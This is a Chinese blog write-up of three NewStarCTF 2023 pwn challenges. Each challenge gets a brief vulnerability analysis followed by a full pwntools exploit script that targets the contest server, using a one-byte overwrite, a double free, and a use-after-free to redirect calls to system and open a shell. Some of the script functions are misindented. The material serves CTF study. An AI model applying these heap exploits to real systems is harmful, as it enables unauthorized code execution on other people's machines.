NewStarCTF 2023 公开赛道 WEEK4|PWN

于 2023-11-01 19:33:44 发布
阅读量357 收藏
点赞数
文章标签: 安全 网络安全 python linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51890658/article/details/134124397
版权

1.game

2.Double

3.ezheap

1.game

考点:一字节漏洞

开了canary和地址随机,拖入ida分析,一个小菜单,在初始化时选择给v6赋值,用它来确定是送原石还是kfc联名套餐,在循环中看出只能选择一个  1为送原石的条件,当v7>0x3ffff可泄露system地址

 myread函数中存在一字节漏洞,输入8个非\n数据,可把v6修改为0,所以先把v6赋值为1,通过一字节洞把v6赋为0,可进入送原石,然后v8,v9都为1了,此时可进入这个地方,libc库查出puts和system的偏移量,然后通过偏移量把puts改为system,(v5输入/bin/sh\x00)

EXP:

#coding=utf-8

from pwn import *
'''from LibcSearcher import *
from pwnlib import *'''
sh=remote("node4.buuoj.cn",25445)
#sh=process("./game")
elf=ELF("./game")
libc=ELF("libc-2.31.so")
context.arch="amd64"

un=lambda a:sh.recvuntil(a)
rv=lambda a:sh.recv(a)
rl=lambda:sh.recvline()
sd=lambda a:sh.send(a)
sl=lambda a:sh.sendline(a)
Jz=lambda a:u64(sh.recv(6)+"\x00"*2)-a
inter=lambda :sh.interactive()
U64=lambda a:u64(sh.recv(6)+"\x00"*2)-libc.sym[a]

un("请选择你的伙伴\n")
sl("1")

un("2.扣2送kfc联名套餐\n")
sl("2")
un("你有什么想对肯德基爷爷说的吗?\n")
sd("/bin/sh\x00")
k=0
while k<4:
    un("2.扣2送kfc联名套餐\n")
    sl("1")
    k=k+1

un("这是给你的奖励 ")
system=int(sh.recv(14),16)
jz=system-libc.sym['system']
puts=jz+libc.sym['puts']
print hex(jz)
print hex(puts)
print hex(system)
print hex(libc.sym['puts'])
print hex(libc.sym['system'])
print hex(libc.sym['puts']-libc.sym['system'])
def fun():
    un("2.扣2送kfc联名套餐\n")
    sl("3")
    sl("8592")

fun()

inter()

2.Double

是一道简单的堆题,考察的点就是double free

保护机制开的较多,但还好没开地址随机

在初始化时把0x602068地址赋值为0x31  分析add

idx可输入负数,但got不可修改没用

在del中有uaf,可double free

在check中当0x602070中的值为0x666就可以给shell

因为在0x602068初始化了0x602068为0x31,且有uaf,且在add中申请的空间为0x20(0x20-0x28都只开0x20空间,除头部分)可在这个地址double free

然后修改0x602070为0x666即可getshell

EXP:

from pwn import *
from LibcSearcher import *
from pwnlib import *

sh=remote("node4.buuoj.cn",29660)
#sh=process("./Double")
elf=ELF("./Double")
libc=ELF("libc.so.6")

context.arch="amd64"

un=lambda a:sh.recvuntil(a)
rv=lambda a:sh.recv(a)
rl=lambda:sh.recvline()
sd=lambda a:sh.send(a)
sl=lambda a:sh.sendline(a)
Jz=lambda a:u64(sh.recv(6)+"\x00"*2)-a
inter=lambda :sh.interactive()
U64=lambda a:u64(sh.recv(6)+"\x00"*2)-libc.sym[a]


def add(idx,data):
    un(">\n")
    sl("1")
    un("idx\n")
    sl(str(idx))
    un("content\n")
    sd(data)

def free(idx):
    un(">\n")
        sl("2")
        un("idx\n")
        sl(str(idx))

k=0x602060

add(0,"1")
add(1,"1")
free(0)
free(1)
free(0)

add(2,p64(k))
add(2,p64(k))
add(2,p64(k))
add(2,p64(0x666))

un(">\n")
sl("3")

sl("cat flag")


inter()

3.ezheap

有uaf,这样可以把两个指针指向同一个chunk

每次开辟一个0x28的空间来存放自己申请chunk的地址和size,可申请一个大的空间,mmap映射的地址,它的地址和libc离得近,可通过它来泄露libc

然后通过uaf来实现把free_hook的值改为system,最后free时即可getshell

EXP:

#coding=utf-8

from pwn import *
from LibcSearcher import *
from pwnlib import *
sh=remote("node4.buuoj.cn",29652)
#sh=process("./ezheap")
elf=ELF("./ezheap")
libc=ELF("libc.so.6")
#libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
context.arch="amd64"

un=lambda a:sh.recvuntil(a)
rv=lambda a:sh.recv(a)
rl=lambda:sh.recvline()
sd=lambda a:sh.send(a)
sl=lambda a:sh.sendline(a)
Jz=lambda a:u64(sh.recv(6)+"\x00"*2)-a
inter=lambda:sh.interactive()
U64=lambda a:u64(sh.recv(6)+"\x00"*2)-libc.sym[a]

def add(idx,size,data):
    un(">>\n")
    sl("1")
    un("idx(0~15): \n")
    sl(str(idx))
    un("size: \n")
    sl(str(size))
    un("note: \n")
    sl(data)


def free(idx):
    un(">>\n")
        sl("2")
        un("idx(0~15): \n")
        sl(str(idx))

def show(idx):
    un(">>\n")
        sl("3")
        un("idx(0~15): \n")
        sl(str(idx))

def edit(idx,data):
    un(">>\n")
        sl("4")
        un("idx(0~15): \n")
        sl(str(idx))
    un("content: \n")
    sd(data)

add(0,0x100,"a")
add(1,0x50000,"a")
add(2,0x100,"a")
add(3,0x100,"a")

free(1)
free(2)
add(4,0x20,"a"*24)
show(4)
un("a"*24)
jz=u64(sh.recv(6)+"\x00"*2)-0x10+0x51000
print hex(jz)

system=jz+libc.sym['system']
free_hook=jz+libc.sym['__free_hook']
edit(4,p64(0x50000)+p64(0)*2+p64(free_hook))
edit(1,p64(system))
edit(4,"/bin/sh\x00")
free(1)

inter()

Binary..
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
NewStarCTF 2023 公开赛道 Week1(1),View的这些基础知识你必须要知道
04-08 781
c = pow(m,e,n) print(n) print©使用风二西(风大)的轩禹RSA工具分解模数N,然后计算私钥,计算明文,明文转字符即可获得flag from secret import flag from Crypto.Util.number import *p = getPrime(1024) q = getPrime(1024)d = getPrime(32) e = inverse(d, (p-1)*(q-1)) n = p*q m = bytes_to_long(flag)c = po
[BUUCTF NewStarCTF 2023 公开赛道] week4 crypto/pwn
weixin_52640415的博客
10-30 879
Schmidt-Samoa密码系统, NTRU, smart攻击,p-1光滑分解,B=A*x+e 含误差用格求解, double,off_by_one,
NewStarCTF 2023 公开赛道 WEEK2|Crypto
qq_73643549的博客
10-11 1268
获取一组发现难以解密,所以考虑靶机特性,因为是对同一个明文加密,所以我们。但是看到题目只解一半,也就说m > q,即k4 < 0, 所以h就是我们要求取的系数。因此可以使用广播攻击(见题,如果关注到题目含义就能很快反应,笔者是崩溃的过程中提出为什么给我这么恶心的靶机才意识到的)。根据加密过程,我们知道这里应该采取费马费解法,所以我们可以把n丢到yafu中去,可以获取得到两个因子。好好分析还是挺简单的,因为只需要搞清楚h是什么就可以了。知道(p,q)后,我们就可以破解RSA了。,我们提取出(p-1)。
Crypto(3)NewStarCTF 2023 公开赛道 WEEK2|Crypto-不止一个pi
m0_66039322的博客
10-19 217
很容易知道这道题考察的是。
NewStarCTF 2023 公开赛道 Week1
Fab1an的博客
10-02 2534
首先要通过Level 1 ,发现它是PHP的弱类型比较,只要两个数的md5加密后的值以0e开头就可以绕过,因为php在进行弱类型比较(即==)时,会先转换字符串的类型,再进行比较,而在比较时因为两个数都是以0e开头会被认为是科学计数法,0e后面加任何数在科学计数法中都是0,所以两数相等。数组为空,那么MD5加密之后都为0,那么就是相等的,满足条件,可以成功绕过。那么接下来需要绕过if(!打开之后,是一个登录界面,试一下管理员账号admin,密码123456,登录失败,那么我们抓包,然后爆破一下密码。
NewStarCTF 2023 公开赛道 Week2
Fab1an的博客
10-16 1169
时,得到的结果只是phpinfo()这个字符串,它只是将我们构造的array_rand(array_flip(getallheaders()))给执行了而已,所以我们要先用一个eval将array_rand(array_flip(getallheaders()))变为phpinfo();如果在后面,可以用array_reverse()将数组反转过来之后,再用current拿它,它在中间就不好搞了,又不能用next套娃,因为next的参数要是数组,第一次next完成之后就不是数组了,变成字符串了。
Python库 | pwn-machine-1.1.tar.gz
03-11
python库。 资源全名:pwn-machine-1.1.tar.gz
pwn ubuntu18的运行环境自己搭建
11-15
pwn ubuntu18的运行环境具体情参考https://blog.csdn.net/weixin_41748164/article/details/127874334
pwn练习附件四道题含exp
11-21
个人pwn练习题目https://blog.csdn.net/yusakul/article/details/103147299,含exp,推荐去原链接下载:https://bbs.ichunqiu.com/thread-42241-1-1.html
browser_pwn:浏览器pwn,现在主要工作
03-22
browser_pwn 浏览器pwn,现在主要工作。 v8_pwn v8开发 jsc_pwn 对jsc的利用
pwn题目中的libc-2.27.so文件
04-11
pwn题,有些时候题目不给这个文件,这里是这个库的文件。
NewStarCTF 公开赛道
m0_62129839的博客
10-29 827
reverse一下倒着取得到最后将回显逆转收获无2.文件包含先进行一个代码审计1219893521,伪随机,给了值,爆破出种子就行if语句playload:flag收获base被禁用rot13反序列化,这类题我觉得是我比较薄弱的地方,好好研究研究:poc链我们这样分析,尾链是Sec-> invoke,倒推__invoke() //当脚本尝试将对象调用为函数时触发clone() //当把一个对象赋给另一个对象时自动调用。
NewStarCTF 2023 [WEEK 1] PWN
Xzzzz911的博客
10-01 1216
第一周的题目相对比较容易,pwn没有ak有点可惜,伪随机的部分弄得还不是很清楚,需要加把油伪随机部分还相对薄弱,需要加把油,绕过pie掌握的差不多了,加油,奥里给!!!
NewStarCTF 2023 公开赛道部分wp
m0_66458291的博客
10-02 410
参加NewStarCTF 2023 公开赛道将自己做出来的题目进行总结一下,包括web和密码学两个部分的部分题目
NewStarCTF 2023 公开赛道 Week4
Fab1an的博客
10-30 440
snow 是一款在html嵌入隐写信息的软件,原理是通过在文本文件的末尾嵌入空格和制表位的方式嵌入隐藏信息,不同空格与制表位的组合代表不同的嵌入信息。nmap.pcap文件中有大量的SYN包,而且端口号不同,验证了Nmap的SYN Scan的工作原理。SNOW官网:The SNOW Home Page (darkside.com.au)snow在ascii文本末尾隐藏数据,可以通过插入制表符和空格是数据在浏览器不可见。snow最多添加7个空格,使每八列插入三位,文件中有许多制表符和空格。
NewStarCTF 公开赛-web
qq_61768489的博客
11-22 1899
cookie 修改admin 源码发现key GET和POST传参即可。
NewStarCTF 公开赛道-WEEK1|REVERSE
qq_61774705的博客
10-07 2167
合起来就是:.flag{h3llo_rvers1ng_w0rld}加密思路就是:先把输入先base64编码->再异或字符串。解密思路就是:异或字符串->base64解码。
2023 羊城杯 pwn
最新发布
01-02
2023年的羊城杯pwn比赛将是一场精彩的技术对决。作为网络安全领域的顶尖比赛之一,羊城杯吸引了来自全球各地的顶尖选手参与。比赛将涉及各种pwn技术,包括堆溢出、格式化字符串漏洞、内存泄露等。参赛选手需要展示出扎实的漏洞利用能力和对各种漏洞类型的深刻理解。 在比赛中,选手们将不仅需要迅速理解并攻克给定的目标程序,还要在极短的时间内快速编写出最有效的漏洞利用代码。比赛中还可能涉及到逆向工程和加密算法的挑战,综合了对系统原理和网络安全的深入理解。 对于参赛选手来说,需要具备丰富的经验和深厚的技术功底,以应对各种复杂多变的攻击场景。他们需要灵活运用各种pwn技术和工具,快速定位和利用漏洞,最大限度地获取目标系统的控制权。 羊城杯pwn比赛将成为一次全球顶尖网络安全专家的盛会,也将极大地推动网络安全技术的发展和创新。这场比赛将不仅展现出各选手的技术实力,也将促进国际网络安全领域的交流与合作,为推动网络安全事业的发展贡献力量。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值